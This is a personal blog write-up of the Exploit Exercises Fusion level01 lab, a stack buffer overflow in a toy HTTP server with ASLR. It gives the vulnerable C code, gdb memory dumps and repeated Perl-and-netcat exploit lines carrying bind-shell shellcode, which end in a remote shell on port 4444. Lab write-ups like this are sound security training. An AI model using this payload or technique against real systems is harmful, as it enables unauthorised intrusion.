Over the past week or so I have been following industry news. Either by watching my Twitter feed and other social media, or listening to the podcast Risky Business. Most recently KRACK has come to light with a fair amount of conversation around it. I’ve also decided to continue on with Fusion and this time it gets a little bit more interesting.

We are initially presented with the level01 <https://exploit-exercises.com/fusion/level01/> page which has something daunting (for me) toggled “Yes”

ASLR is something that I have not had to deal with in the past so we will see how I go.

Code Review

#include "../common/common.c" int fix_path(char *path) { char resolved[128]; if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open strcpy(path, resolved); } char *parse_http_request() { char buffer[1024]; char *path; char *q; // printf("[debug] buffer is at 0x%08x :-)

", buffer); :D if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host"); if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request"); path = &buffer[4]; q = strchr(path, ' '); if(! q) errx(0, "No protocol version specified"); *q++ = 0; if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol"); fix_path(path); printf("trying to access %s

", path); return path; } int main(int argc, char **argv, char **envp) { int fd; char *p; background_process(NAME, UID, GID); fd = serve_forever(PORT); set_io(fd); parse_http_request(); }

As the hint states, this is simply level00 with Address Space Layout Randomization and no information leak. So in my mind I did not plan anything else other than throwing the exploit from level00 at it.

Exploit Development

Once again I found out which port this was sitting on by viewing ps -ef

20001 1222 1 0 17:25 ? 00:00:00 /opt/fusion/bin/level01

At this point I started to do some reading on defeating ASLR. Naturally brute forcing was the easiest option so I gave that a crack first. Funnily enough I was correct on the third go.

First I wanted to see where I would land roughly in the first place so I sent the original exploit for level00 at port 20001.

(gdb) attach 1222 Attaching to process 1222 Reading symbols from /opt/fusion/bin/level01...done. Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done. done. Loaded symbols for /lib/i386-linux-gnu/libc.so.6 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 0xb77dc424 in __kernel_vsyscall () (gdb) set follow-fork-mode child (gdb) c Continuing. [New process 1793]

➜ Fusion perl -e ‘print “GET ” . “A”x139 . “\x97\xf9\xff\xbf” . ” HTTP/1.1″ . “\x90″x32 . “\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80″‘ | nc 192.168.43.240 20001

Program received signal SIGSEGV, Segmentation fault. [Switching to process 1793] 0xbffff997 in ?? () (gdb) x/40xw 0xbffff997 0xbffff997: Cannot access memory at address 0xbffff997 (gdb) x/40xw $esp+40 0xbfd6a2b8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfd6a2c8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfd6a2d8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfd6a2e8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfd6a2f8: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfd6a308: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfd6a318: 0x41414141 0x41414141 0x41414141 0x41414141 0xbfd6a328: 0x41414141 0x41414141 0x41414141 0x97414141 0xbfd6a338: 0x00bffff9 0x50545448 0x312e312f 0x90909090 0xbfd6a348: 0x90909090 0x90909090 0x90909090 0x90909090 (gdb) attach 1222 A program is being debugged already. Kill it? (y or n) y Attaching to program: /opt/fusion/bin/level01, process 1222 Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done. done. Loaded symbols for /lib/i386-linux-gnu/libc.so.6 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 0xb77dc424 in __kernel_vsyscall () (gdb) set follow-fork-mode child (gdb) c Continuing. [New process 1800]

➜ Fusion perl -e ‘print “GET ” . “A”x139 . “\x97\xf9\xff\xbf” . ” HTTP/1.1″ . “\x90″x32 . “\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80″‘ | nc 192.168.43.240 20001

Program received signal SIGSEGV, Segmentation fault. [Switching to process 1800] 0xbfd6a338 in ?? () (gdb) x/40xw 0xbfd6a338 0xbfd6a338: 0x00bfd6a3 0x50545448 0x312e312f 0x90909090 0xbfd6a348: 0x90909090 0x90909090 0x90909090 0x90909090 0xbfd6a358: 0x90909090 0x90909090 0x90909090 0xe3f7db31 0xbfd6a368: 0x6a534353 0xb0e18902 0x5b80cd66 0x0268525e 0xbfd6a378: 0x6a5c1100 0x89505110 0x58666ae1 0x418980cd 0xbfd6a388: 0xb004b304 0x4380cd66 0x80cd66b0 0x3f6a5993 0xbfd6a398: 0x4980cd58 0x2f68f879 0x6868732f 0x6e69622f 0xbfd6a3a8: 0x5350e389 0x0bb0e189 0x000080cd 0x00000000 0xbfd6a3b8: 0x00000000 0x00000000 0x00000000 0x00000000 0xbfd6a3c8: 0x00000000 0x00000000 0x00000000 0x00000000

I noticed that the nops weren’t far off and decided to just test jumping further up a bit.

➜ Fusion perl -e ‘print “GET ” . “A”x139 . “\x78\xa3\xd6\xbf” . ” HTTP/1.1″ . “\x90″x256 . “\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80″‘ | nc 192.168.43.240 20001

➜ Fusion nc 192.168.43.240 4444

id

uid=20001 gid=20001 groups=20001

Success!